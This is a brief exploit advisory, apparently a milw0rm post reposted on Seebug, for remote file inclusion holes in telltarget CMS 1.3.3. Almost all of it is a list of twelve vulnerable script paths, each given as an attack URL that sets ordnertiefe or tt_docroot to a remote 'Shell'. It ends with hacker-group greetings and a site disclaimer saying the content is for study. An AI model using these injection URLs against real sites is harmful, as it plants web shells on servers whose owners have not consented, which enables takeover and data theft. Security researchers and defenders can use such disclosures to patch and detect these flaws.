# telltarget CMS 1.3.3 <= Multiple Remote File Inclusion Vulnerabilitie # D.Script: http://www.telltargetcms.de/download/telltarget_1.3.3.zip # Discovered by: GolD_M = [Mahmood_ali] # Homepage: http://www.Tryag.Com/cc # Exploit:[Path]/phplib/site_conf.php?ordnertiefe=Shell # Exploit:[Path]/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/module/referenz.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=Shell # Exploit:[Path]/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=Shell # Greetz To: Tryag-Team ....&&& # milw0rm.com [2007-05-09]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论